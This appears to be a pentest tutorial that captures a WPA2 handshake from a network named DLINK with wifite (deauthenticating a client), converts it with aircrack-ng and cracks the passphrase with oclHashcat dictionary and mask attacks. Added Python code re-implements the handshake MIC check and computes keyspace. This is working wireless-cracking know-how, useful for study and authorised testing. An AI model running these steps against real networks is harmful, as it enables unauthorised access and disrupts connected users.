To run an offline GPU attack against a WPA/WPA2-PSK network we first need to capture the 4-way handshake. For this demo we'll be using an Alfa AWUS036H wireless card under BackTrack 5 R2 64-bit.
I could go in depth about capturing the WPA handshake manually with aircrack-ng, but that has been covered in full in many places already, so instead I'm going to use a great Python tool called wifite that automates the capture and cracking process (it also supports automated WEP cracking using many types of attacks).
Downloading it is a simple case of using wget 🙂
```
cd /pentest/wireless/
wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
chmod +x wifite.py
```
Wifite supports both command-line and GUI control. To be honest the command line is so good I've never bothered with the GUI, so here we'll use the CLI.
The following command tells wifite to target only the SSID "DLINK" and to attempt WPA attacks alone (--no-wep). --no-strip leaves the capture file intact instead of stripping it down to the handshake frames, and because we answer "none" at the dictionary prompt only the handshake is captured and no automated cracking is attempted.
```
root@bt:/pentest/wireless# ./wifite.py -e "DLINK" --no-wep --no-strip

  .;'                     `;,
 .;'  ,;'             `;,  `;,    WiFite r84
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::   mass WEP/WPA cracker
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'    designed for backtrack4
  ':.       /_____\      ,:'
           /       \

 [+] only scanning for WPA-encrypted networks
 [+] wpa handshake stripping disabled
 [+] searching for devices in monitor mode...
 [!] no wireless interfaces are in monitor mode!
 [+] select which device you want to put into monitor mode:
   1. wlan0    Realtek RTL8187L    rtl8187 - [phy1]
 [+] select the wifi interface (between 1 and 1): 1
 [+] putting "wlan0" into monitor mode...
 [+] searching for devices in monitor mode...
 [+] defaulting to interface "mon0"
 [+] waiting for "DLINK" to appear, press Ctrl+C to skip...
 [+] found "DLINK", waiting 1 sec for clients...
 [+] in order to crack WPA, you will need to enter a dictionary file
 [+] enter the path to the dictionary to use, or "none" to not crack at all: none
 [+] estimated maximum wait time is 05 minutes
 [+] attacking "DLINK"...
 [0:05:00] starting wpa handshake capture
 [0:04:54] added new client: 60:C5:47:72:A5:75, total: 1
 [0:04:51] sent 3 deauth packets; handshake captured! saved as "hs/DLINK.cap"
 [+] attack is complete: 1 handshake,
root@bt:/pentest/wireless#
```
Successful 🙂 The part we are interested in here is the DLINK.cap file (wifite saves it as hs/DLINK.cap; the commands below are run on a copy in ~/Desktop). Note how wifite got it: it sent deauthentication frames to the associated client 60:C5:47:72:A5:75 so that it would re-associate and perform a fresh 4-way handshake. That means a client has to be connected for this to work, and the deauth is visible and disruptive to that client, so only do it on networks you are authorised to test. Confirm you have the handshake inside the capture file using the following command:
```
root@bt:~/Desktop# aircrack-ng DLINK.cap
Opening DLINK.cap
Read 1971 packets.

   #  BSSID              ESSID                     Encryption

   1  1C:AF:F7:26:11:AE  DLINK                     WPA (1 handshake)

Choosing first network as target.

Opening DLINK.wifite.cap
Please specify a dictionary (option -w).

Quitting aircrack-ng...
root@bt:~/Desktop#
```
So you've gone to all the effort of capturing the 4-way handshake and now want to crack it on your GPU rather than with rainbow tables (which only help if someone has precomputed PMKs for your exact SSID, since the SSID is the PBKDF2 salt). Using the same 4-way handshake from above we'll attempt to crack it with Hashcat.
First we need to convert the pcap into the hccap format that hashcat understands. aircrack-ng 1.1 can do this with the -J option, and it comes preinstalled in BT5 R2. (Note: BT5 R1 ships an older version that cannot write hccap files.)
```
aircrack-ng DLINK.cap -J DLINK
Opening DLINK.cap
Read 1971 packets.

   #  BSSID              ESSID                     Encryption

   1  1C:AF:F7:26:11:AE  DLINK                     WPA (1 handshake)

Choosing first network as target.

Opening DLINK.wifite.cap
Reading packets, please wait...

Building Hashcat (1.00) file...

[*] ESSID (length: 5): DLINK
[*] Key version: 2
[*] BSSID: 1C:AF:F7:26:11:AE
[*] STA: 60:C5:47:72:A5:75
[*] anonce: CF 50 01 03 B5 73 08 B2 6A C2 AB 2C 07 DA 72 52 0A C3 21 60 D2 C6 DE 5F 05 93 8D 08 D0 08 9A 46
[*] snonce: 55 41 AB EA 41 5F F5 02 AF D2 02 D7 D2 84 6B D8 42 77 27 79 77 96 43 4F 34 F7 4F 7E 08 17 40 BA
[*] Key MIC: 0D FA B1 7E 28 BE 07 15 86 37 3D 9F 2D 12 A0 18
[*] eapol: 02 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00 01 55 41 AB EA 41 5F F5 02 AF D2 02 D7 D2 84 6B D8 42 77 27 79 77 96 43 4F 34 F7 4F 7E 08 17 40 BA 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 30 14 01 00 00 0F AC 02 01 00 00 0F AC 04 01 00 00 0F AC 02 0C 00

Successfully written to DLINK.hccap

Quitting aircrack-ng...
```
Now it's just a simple case of pointing hashcat at the new hccap file with -m 2500 (the WPA/WPA2 mode). We'll start off with a dictionary demo:
```
$ ./oclHashcat-plus64.bin -m 2500 DLINK.hccap darkc0de.lst
oclHashcat-plus v0.07 by atom starting...

Hashes: 1
Unique salts: 1
Unique digests: 1
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Rules: 1
GPU-Loops: 64
GPU-Accel: 16
Password lengths range: 8 - 15
Platform: AMD compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: Cayman, 2048MB, 0Mhz, 22MCU
Device #1: Allocating 26MB host-memory
Device #1: Kernel ./kernels/4098/m2500.Cayman.64.kernel (1483607 bytes)
Scanning dictionary darkc0de.lst: 1047587 bytes (5.83%), 95782 words,
Scanned dictionary darkc0de.lst: 17975873 bytes, 1707659 words, 1707633 keyspace, starting attack...

DLINK:mysecret

Status.......: Cracked
Input.Mode...: File (darkc0de.lst)
Hash.Target..: DLINK
Hash.Type....: WPA/WPA2
Time.Running.: 13 secs
Time.Util....: 13198.3ms/189.8ms Real/CPU, 1.5% idle
Speed........: 67528 c/s Real, 67776 c/s GPU
Recovered....: 1/1 Digests, 1/1 Salts
Progress.....: 1507780/1707633 (88.30%)
Rejected.....: 616522/1507780 (40.89%)
HW.Monitor.#1: 89% GPU, 56c Temp

Started: Fri Mar 23 18:46:36 2012
Stopped: Fri Mar 23 18:46:49 2012
```
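To make concrete what the hccap file holds and what hashcat is actually computing for every candidate in the run above, here is an added Python example (it is not code from wifite, aircrack-ng or hashcat). It re-packs the DLINK fields printed by aircrack-ng -J into the 392-byte hccap record, then runs the PBKDF2, PTK and MIC derivation that -m 2500 performs and compares the result with the captured MIC. The hex constants are the ones shown above; the essid "testnet", the passphrase "hunter22" and the synthetic_hccap helper are constructed here purely for an offline self-check, and any result against the real DLINK capture is only as good as the hex transcribed on the page.

```python
"""Added example (not wifite, aircrack-ng or hashcat code): rebuild the DLINK hccap
from the fields aircrack-ng -J printed, then test a candidate passphrase against it
the way hashcat -m 2500 does (PBKDF2 -> PTK -> KCK -> EAPOL MIC)."""
import hashlib
import hmac
import struct

# hccap record as written by aircrack-ng 1.1 and read by hashcat (392 bytes):
# essid[36] mac1[6]=AP mac2[6]=STA nonce1[32]=SNonce nonce2[32]=ANonce
# eapol[256] eapol_size(int) keyver(int) keymic[16]. The ints are native C ints,
# little-endian on the x86 hosts hashcat runs on.
HCCAP = struct.Struct("<36s6s6s32s32s256sii16s")

# Values copied from the aircrack-ng -J output on the page (fromhex ignores the spaces).
PAGE_ESSID = "DLINK"
PAGE_AP = bytes.fromhex("1C AF F7 26 11 AE")
PAGE_STA = bytes.fromhex("60 C5 47 72 A5 75")
PAGE_ANONCE = bytes.fromhex(
    "CF 50 01 03 B5 73 08 B2 6A C2 AB 2C 07 DA 72 52 0A C3 21 60 D2 C6 DE 5F 05 93 8D 08 D0 08 9A 46")
PAGE_SNONCE = bytes.fromhex(
    "55 41 AB EA 41 5F F5 02 AF D2 02 D7 D2 84 6B D8 42 77 27 79 77 96 43 4F 34 F7 4F 7E 08 17 40 BA")
PAGE_MIC = bytes.fromhex("0D FA B1 7E 28 BE 07 15 86 37 3D 9F 2D 12 A0 18")
# Message 2 of the 4-way handshake, assembled field by field from the same dump. The
# 16-byte MIC field is zeroed: that is how the MIC is computed and how hccap stores it.
PAGE_EAPOL = (
    bytes.fromhex("02 03 00 75")                # 802.1X v2, type 3 (EAPOL-Key), body length 117
    + bytes.fromhex("02 01 0A 00 10")           # RSN descriptor, key info 0x010A (pairwise|MIC|keyver 2), key len 16
    + bytes.fromhex("00 00 00 00 00 00 00 01")  # replay counter
    + PAGE_SNONCE                               # supplicant nonce
    + bytes(48)                                 # key IV(16) + RSC(8) + reserved(8) + MIC(16), all zero
    + bytes.fromhex("00 16")                    # key data length 22
    + bytes.fromhex("30 14 01 00 00 0F AC 02 01 00 00 0F AC 04 01 00 00 0F AC 02 0C 00")  # RSN IE
)


def pack_hccap(essid, ap, sta, anonce, snonce, eapol, keyver, mic):
    """Serialize one handshake; struct NUL-pads the fixed-size byte fields."""
    if len(essid.encode()) > 32 or len(eapol) > 256:
        raise ValueError("essid or eapol too long for hccap")
    return HCCAP.pack(essid.encode(), ap, sta, snonce, anonce, eapol, len(eapol), keyver, mic)


def unpack_hccap(blob):
    essid, ap, sta, snonce, anonce, eapol, size, keyver, mic = HCCAP.unpack(blob)
    return {"essid": essid.rstrip(b"\0").decode(), "ap": ap, "sta": sta,
            "anonce": anonce, "snonce": snonce, "eapol": eapol[:size],
            "keyver": keyver, "mic": mic}


def prf512(pmk, ap, sta, anonce, snonce):
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(MAC)||max(MAC)||min(nonce)||max(nonce)); 4 HMAC-SHA1 blocks, truncated to 64 bytes."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\0" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def compute_mic(passphrase, essid, ap, sta, anonce, snonce, eapol, keyver):
    """The per-candidate work hashcat -m 2500 does: 4096-round PBKDF2-HMAC-SHA1 salted with
    the SSID gives the PMK, the first 16 bytes of the PTK are the KCK, and the KCK MICs the frame."""
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)
    kck = prf512(pmk, ap, sta, anonce, snonce)[:16]
    digest = hashlib.md5 if keyver == 1 else hashlib.sha1  # keyver 1 = WPA/TKIP (HMAC-MD5), 2 = WPA2/CCMP (HMAC-SHA1)
    return hmac.new(kck, eapol, digest).digest()[:16]


def check_passphrase(blob, candidate):
    """True if the candidate reproduces the captured MIC. Candidates outside the WPA-PSK
    length bounds are refused before any hashing, which is what hashcat's Rejected counter counts."""
    if not 8 <= len(candidate) <= 63:
        return False
    h = unpack_hccap(blob)
    mic = compute_mic(candidate, h["essid"], h["ap"], h["sta"], h["anonce"], h["snonce"], h["eapol"], h["keyver"])
    return hmac.compare_digest(mic, h["mic"])


def page_hccap():
    """DLINK.hccap as aircrack-ng would have written it from the values above."""
    return pack_hccap(PAGE_ESSID, PAGE_AP, PAGE_STA, PAGE_ANONCE, PAGE_SNONCE, PAGE_EAPOL, 2, PAGE_MIC)


def synthetic_hccap(passphrase, essid="testnet"):
    """Constructed handshake for offline testing: the page's frame layout, but the MIC is
    derived here from a passphrase we choose, so the checker can be exercised end to end."""
    mic = compute_mic(passphrase, essid, PAGE_AP, PAGE_STA, PAGE_ANONCE, PAGE_SNONCE, PAGE_EAPOL, 2)
    return pack_hccap(essid, PAGE_AP, PAGE_STA, PAGE_ANONCE, PAGE_SNONCE, PAGE_EAPOL, 2, mic)


if __name__ == "__main__":
    with open("DLINK.rebuilt.hccap", "wb") as f:
        f.write(page_hccap())  # loadable with oclHashcat-plus -m 2500 like the original
    for cand in ("mysecret", "mysecret1", "short"):
        print(cand, check_passphrase(page_hccap(), cand))
```

Two things the output above now make sense of: hashcat reports one "salt" because the SSID is the PBKDF2 salt, so precomputation only ever helps for that exact SSID, and roughly 67k candidates per second on a Cayman GPU is what 4096 rounds of HMAC-SHA1 per guess buys you.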
Note the Rejected counter in that run: around 40% of darkc0de.lst never reached the GPU, because WPA-PSK passphrases are at least 8 characters long (and this oclHashcat-plus build accepts at most 15 for -m 2500, as the "Password lengths range" line shows), so those words cannot be the key and are skipped before any hashing. And now a brute-force demo using an 8-character lowercase mask:
```
$ ./oclHashcat-plus64.bin -a 3 -m 2500 DLINK.hccap ?l?l?l?l?l?l?l?l
oclHashcat-plus v0.07 by atom starting...

Hashes: 1
Unique salts: 1
Unique digests: 1
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
GPU-Loops: 64
GPU-Accel: 16
Password lengths range: 8 - 15
Platform: AMD compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: Cayman, 2048MB, 0Mhz, 22MCU
Device #1: Allocating 26MB host-memory
Device #1: Kernel ./kernels/4098/m2500.Cayman.64.kernel (1483607 bytes)

Status.......: Aborted
Input.Mode...: Mask (?l?l?l?l?l?l?l?l)
Hash.Target..: DLINK
Hash.Type....: WPA/WPA2
Time.Running.: 6 secs
Time.Left....: 36 days, 14 hours
Time.Util....: 6108.4ms/87.0ms Real/CPU, 1.4% idle
Speed........: 66385 c/s Real, 74004 c/s GPU
Recovered....: 0/1 Digests, 0/1 Salts
Progress.....: 405504/208827064576 (0.00%)
Rejected.....: 0/405504 (0.00%)
HW.Monitor.#1: 90% GPU, 58c Temp

Started: Fri Mar 23 18:40:25 2012
Stopped: Fri Mar 23 18:40:31 2012
```
Ouch, that's going to take ages: 36 days, no thanks! The 26^8 keyspace (208,827,064,576 candidates) at roughly 66k c/s is exactly why WPA's 4096-round PBKDF2 makes brute force slow going even on a GPU. To save time in testing I've limited the character set to c, e, m, r, s, t and y, as we already know the password and I don't like the sound of leaving it running that long and burning out my GPU!
```
$ ./oclHashcat-plus64.bin -a 3 -m 2500 DLINK.hccap -1 cemrsty ?1?1?1?1?1?1?1?1
oclHashcat-plus v0.07 by atom starting...

Hashes: 1
Unique salts: 1
Unique digests: 1
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
GPU-Loops: 64
GPU-Accel: 16
Password lengths range: 8 - 15
Platform: AMD compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: Cayman, 2048MB, 0Mhz, 22MCU
Device #1: Allocating 26MB host-memory
Device #1: Kernel ./kernels/4098/m2500.Cayman.64.kernel (1483607 bytes)

DLINK:mysecret

Status.......: Cracked
Input.Mode...: Mask (?1?1?1?1?1?1?1?1)
Hash.Target..: DLINK
Hash.Type....: WPA/WPA2
Time.Running.: 1 min, 1 sec
Time.Util....: 61012.9ms/1027.7ms Real/CPU, 1.7% idle
Speed........: 70893 c/s Real, 73327 c/s GPU
Recovered....: 1/1 Digests, 1/1 Salts
Progress.....: 4325376/5764801 (75.03%)
Rejected.....: 0/4325376 (0.00%)
HW.Monitor.#1: 84% GPU, 73c Temp

Started: Fri Mar 23 18:37:12 2012
Stopped: Fri Mar 23 18:38:14 2012
```
Bingo, brute forcing worked (albeit with a rather restricted character set: 7^8 is only 5,764,801 candidates, and hashcat hit the key after working through 75% of them in just over a minute).
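Before launching a mask attack it is worth computing the keyspace the way hashcat does, because the 36-day figure above is simply 26^8 candidates divided by the ~66k c/s this card manages. The following added Python helper (not part of the original post, and not hashcat's own code) parses a hashcat -a 3 mask, including the -1 to -4 custom charsets such as the cemrsty one used above, and returns the candidate count and the worst-case runtime. The 66385 c/s rate used in the usage is the one reported in the aborted run.

```python
"""Added example: keyspace and worst-case runtime of a hashcat -a 3 mask.
Not hashcat code; charset sizes follow hashcat's built-in definitions."""
import string

# hashcat's built-in charsets: ?l a-z, ?u A-Z, ?d 0-9, ?s the 33 printable specials
# (space included), ?a = ?l?u?d?s (95 printable ASCII), ?b every byte value.
BUILTIN = {
    "l": set(string.ascii_lowercase),
    "u": set(string.ascii_uppercase),
    "d": set(string.digits),
    "s": set(" " + string.punctuation),
    "b": {chr(i) for i in range(256)},
}
BUILTIN["a"] = BUILTIN["l"] | BUILTIN["u"] | BUILTIN["d"] | BUILTIN["s"]


def expand_charset(spec, custom):
    """Turn a charset definition ('cemrsty', '?l?d', 'abc?d', '??') into its set of characters.
    `custom` maps '1'..'4' to already-expanded sets, so -2 may reference -1."""
    chars = set()
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            sel = spec[i + 1]
            if sel == "?":                      # '??' is a literal question mark
                chars.add("?")
            elif sel in custom:
                chars |= custom[sel]
            elif sel in BUILTIN:
                chars |= BUILTIN[sel]
            else:
                raise ValueError(f"unknown charset ?{sel}")
            i += 2
        else:                                   # any other character is itself
            chars.add(spec[i])
            i += 1
    return chars


def mask_keyspace(mask, custom_defs=None):
    """Number of candidates `hashcat -a 3 [-1 .. -4 ..] MASK` will generate."""
    custom = {}
    for key, spec in (custom_defs or {}).items():   # resolve -1..-4 in the order given
        custom[key] = expand_charset(spec, custom)
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            total *= len(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:                                       # literal position: exactly one choice
            i += 1
    return total


def eta(mask, rate_per_sec, custom_defs=None):
    """Worst-case wall-clock seconds to exhaust the mask at a sustained candidate rate."""
    return mask_keyspace(mask, custom_defs) / rate_per_sec


if __name__ == "__main__":
    rate = 66385  # c/s Real from the aborted ?l?l?l?l?l?l?l?l run above
    for mask, defs in (("?l?l?l?l?l?l?l?l", None), ("?1?1?1?1?1?1?1?1", {"1": "cemrsty"})):
        print(f"{mask} {defs or ''}: {mask_keyspace(mask, defs):,} candidates, "
              f"{eta(mask, rate, defs) / 86400:.1f} days worst case")
```

The two numbers it produces for the page's masks are the ones hashcat printed in its Progress lines, 208827064576 and 5764801, so the estimate can be trusted before committing a GPU to a month-long job.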